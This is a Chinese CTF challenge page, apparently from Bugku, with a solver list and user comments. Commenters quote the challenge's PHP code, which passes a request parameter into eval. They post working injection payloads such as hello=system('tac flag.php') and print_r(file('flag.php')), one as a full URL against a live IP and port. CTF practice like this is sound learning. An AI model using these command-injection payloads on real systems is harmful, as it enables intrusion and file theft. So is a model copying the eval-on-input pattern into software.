评分(10)
解题动态
cccjfddfgyd 攻破了该题 7小时前
hsk_zy 攻破了该题 7小时前
yogalin 攻破了该题 8小时前
main123 攻破了该题 8小时前
k12g 攻破了该题 8小时前
li3427379304 攻破了该题 11小时前
呢称被我吃掉了 攻破了该题 14小时前
haduck 攻破了该题 16小时前
xiao ovo 攻破了该题 17小时前
笛安丶 攻破了该题 17小时前
进击的鱼尾 攻破了该题 1天前
1112223 攻破了该题 1天前
jjjdas 攻破了该题 1天前
nanaqilin 攻破了该题 1天前
小白RM 攻破了该题 1天前
xc8888888 攻破了该题 1天前
tschick 攻破了该题 1天前
哈哈1 攻破了该题 1天前
一骑绝尘 攻破了该题 1天前
评论
safemaker2021 5年前
举报
把file函数带进去eval中,以PHP执行
Easyoung 5年前
举报
直接在评论里发flag,年轻人不讲武德?
sn1p3r 5年前
举报
@harry 看到管理员三个字,熠熠生辉。
harry 管理员 5年前
举报
动态flag他们发了也没事
xiao 5年前
举报
直接用?hello=file('flag.php'),var_dump()函数可以打印
wyx48046 5年前
举报
厉害!
Hiiro 5年前
举报
大佬大佬
test_ctf 5年前
举报
牛逼!
Hacker23 5年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 4年前
举报
原理是什么啊???想了解一下
guoguo 5年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 5年前
举报
为啥用cat不行呢?
痕夕 5年前
举报
看不懂,求解,大佬
SwBack 5年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 4年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 5年前
举报
为啥用cat不行呢?
BBBugku 5年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 5年前
举报
感谢
lurnco 5年前
举报
Too young Too simple
Discuze奇 5年前
举报
我的金币不太允许了呀。。。
lurnco 5年前
举报
可以创个小号做后面的题人?
1amer 5年前
举报
直接读文件吧